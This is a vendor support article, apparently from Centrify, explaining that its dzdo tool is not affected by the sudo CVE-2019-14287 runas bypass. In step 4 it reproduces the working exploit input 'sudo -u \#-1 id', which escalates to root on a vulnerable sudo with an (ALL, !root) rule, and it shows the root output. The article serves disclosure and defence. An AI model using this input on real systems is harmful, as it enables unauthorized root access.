Applies to: All version of Centrify Infrastructure Service

Question:

Is Centrify dzdo affected by the vulnerability CVE-2019-14287?

Reference:
https://www.sudo.ws/alerts/minus_1_uid.html

Answer:

Centrify dzdo has its own policy settings which is the DirectAuthorize Command settings, in which we set the dzdo_runas for the user/group runas settings of the command, such setting is specific, allowing only exact name / id / SELF / ALL.

While dzdo will always check the validity of the target user / group if they are not SELF / ALL, so Centrify dzdo will not fail into such breach trick.

As a quick example below:

1. We can setup dzcmd to run command 'id' as only SELF:

Privileged commands:
  Name              Command    Path       Run As  Auth   Exec  Source Roles
  ---------------   ---------- ---------  ------- ----- -----  --------------------
  id/ng_child       id         User       #       Self   Yes   UNIX Login/ng_child

2. While setup the sudo sudoers file to run 'id' as ALL but root:

smk2k12r2-test1   ALL=(ALL, !root)       PASSWD: /usr/bin/id

3. Now check on the sudo and dzdo version:

sudo -V
Sudo version 1.8.23

dzdo -V
Dzdo version 5.6.0-209(based on Sudo version 1.8.20p2)

4. Due to the vulnerability, sudo can be hacked to run as root:

   sudo -u \#-1 id
   [sudo] password for smk2k12r2-test1:
   uid=0(root) gid=10000(unixgroup) groups=10000(unixgroup) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
   
   

5. As shown below, dzdo is not affected:

dzdo -u \#-1 id
Sorry, user smk2k12r2-test1 is not allowed to execute '/bin/id' as #-1 on numenor.

6. If we look into detail, we can see dzdo did real id checking for the UID and denied as below:

   Oct 15 13:39:14 localhost dzdo[56797]: DEBUG dz.rights match(command = /bin/id, binary = /bin/id, as = #-1, checkSelf = false) against pattern = id
   .
   .
   

   Oct 15 13:39:14 localhost dzdo[56797]: DEBUG dz.rights   requested user #-1 not allowed for this command object